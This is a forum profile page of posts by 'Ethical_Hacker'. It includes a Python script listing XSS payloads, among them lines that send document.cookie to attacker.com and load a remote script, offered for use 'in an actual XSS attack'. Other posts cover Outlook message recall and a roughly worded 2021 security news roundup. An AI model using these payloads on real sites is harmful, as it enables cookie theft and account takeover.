top of page

Forum Posts

Ethical_Hacker
Dec 10, 2022
In Questions & Answers
0
0
4
Ethical_Hacker
Dec 10, 2022
In Questions & Answers
Here is an example of a simple Python script that you can use to generate 10 XSS payloads: import random xss_payloads = [ "<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>", "<iframe src=javascript:alert('XSS')>", "<svg/onload=alert('XSS')>", "<body onload=alert('XSS')>", "<object data=javascript:alert('XSS')>", "<script>document.location='http://attacker.com/cookiesteal.php?cookie='+document.cookie</script>", "<script>new Image().src='http://attacker.com/cookiesteal.php?cookie='+document.cookie</script>", "<script src=http://attacker.com/xss.js></script>", "<meta http-equiv=refresh content=0;url=javascript:alert('XSS')>" ] for i in range(10): print(random.choice(xss_payloads)) This script defines a list of XSS payloads, and then uses the random.choice() function to randomly select and print one of the payloads 10 times. You can customize this script by modifying the list of XSS payloads to include different payloads, or by changing the number of payloads that are generated. You can also modify the script to perform additional actions, such as saving the generated payloads to a file or using them in an actual XSS attack.
0
0
1
Ethical_Hacker
Dec 10, 2022
In Questions & Answers
In Microsoft Outlook, the recall feature allows you to attempt to recall or replace an email message that you have sent to someone else. If the recipient has not yet opened the message, the recall feature can attempt to delete the message from their mailbox and replace it with a new message from you. To recall an email message in Outlook, follow these steps: Open Outlook and go to your "Sent" folder. Locate the message you want to recall and select it. From the "Move" group on the "Home" tab, click "Actions" and select "Recall This Message." In the Recall Message window, select one of the following options: Delete unread copies of this message: This option attempts to delete the message from the recipient's mailbox, and they will not be able to read it. Delete unread copies and replace with a new message: This option attempts to delete the message from the recipient's mailbox and replaces it with a new message that you compose. If you selected the "Delete unread copies and replace with a new message" option, a new email message window will open. Compose your message and click "Send." It's important to note that the recall feature is not guaranteed to work. It only works if the recipient has not yet opened the original message, and it may not work if the recipient is using a different email client or has configured their mailbox in a certain way. Additionally, even if the recall is successful, the original message may still exist in the recipient's "Deleted Items" folder or in their email server's "Trash" folder.
0
0
3
Ethical_Hacker
Jul 30, 2021
In Darkworldhacker Discussion
Nowadays cybercriminal targeting in the healthcare sector today as cybercriminal compromised an Ontario-based mental health services provider. Cybercriminals are aggressively rebuilding their malware which makes as an indicator for the more sophisticated attack in near future. Meanwhile, the source code of Brunhilda malware has been reused to create a new Vultur Android malware that has affected between 5,000 and 8,000 users, so far. Top Breaches Reported in the Last 24 Hours Data leaked British Columbians Sophisticated information stole from British Columbians from Homewood Health. The affected clients include BC Housing, Translink, and the Provincial Health Services Authority. Some of the Sophisticated data has been put for auction on the Marketo dark web. Top Malware Reported in the Last 24 Hours Oscorp evolves An one more dangerous android malware was observed abusing accessibility services in the devices to hijack user passwords from European banking app. Oscorp has been renewed as the new UBELandroid botnet that is being sold for a price of $980 on underground forums New Vultur Android malware A newly android malware called Vultur is also able to records smartphones via VNC to steal passwords. First spotted in March 2021 by Dutch security firm ThreatFabric, Cybersecurity estimated that Vultur has infected between 5,000 and 8,000 users so far. DoppelPaymer rebrands itself The DoppelPaymer ransomware operation was rebranding as Grief with identical encryption algorithms, i.e. 2048-bit RSA and 256-bit AES and other minor code changes. Agent Tesla and Formbook Malware Cybersecurity researchers reported that attackers are using the XAMPP web server solutions stack to host Agent Tesla and Formbook malware. Top Vulnerabilities Reported in the Last 24 Hours Security Flawed open-source project Cybersecurity researchers discovered major nine security sophisticated flaws in three open-source projects: Akaunting, EspoCRM, and Pimcore, according to The Hacker News. All of them are typically used by a wide range of small and medium-sized businesses. These flaws are used to execute arbitrary javascript code, and take control of operating systems, and trigger a DoS condition. A critical flaw in Microsoft Hyper-V A major flaw in Microsoft Hyper-V can allow attackers to push a Dos condition or execute arbitrary code on systems. The flaw resides in Microsoft Hyper-V’s network switch driver (vmswitch.sys), it affects Windows 10 and Windows Server 2012 through 2019. Foxit Plugs multiple security holes Foxit software this week releases major security updates for its pdf reader and PDF editor app. some of the security holes can remote code execution. Vulnerabilities addressed by Foxit were identified by Cisco Talos researchers, all three leading to arbitrary code execution. And tracked as CVE-2021-21831, CVE-2021-21870, and CVE-2021-21893 the bugs also carry a CVSS severity score of 8.8. Security vulnerability Moodle e-learning platform A major sophisticated attack on Moodle e-learning platform could be abused to allow the access of student data and test papers and also possibly even manipulate exam results. Vulnerable IP cameras As per France-based cybersecurity firm, RandoricSec IP cameras sold by a dozen of vendors are vulnerable to remote assaults due to a slew of serious and high-severity flaws affecting UDP Technology firmware. Flaws were discovered after the study of IP cameras. Hackers can abuse the vulnerability to take full control of vulnerable cameras.
0
0
0
Ethical_Hacker
Jul 14, 2021
In Darkworldhacker Discussion
Share your thoughts. Feel free to add GIFs, videos, #hashtags and more to your posts and comments. Get started by commenting below.
0
0
0
Ethical_Hacker
Jul 14, 2021
In Darkworldhacker Discussion
We'd love to get to know you better. Take a moment to say hi to the community in the comments.
0
0
0
Ethical_Hacker
Jul 14, 2021
In Darkworldhacker Discussion
We want everyone to get the most out of this community, so we ask that you please read and follow these guidelines: Respect each other Keep posts relevant to the forum topic No spamming
0
0
0

Ethical_Hacker

Admin
More actions
bottom of page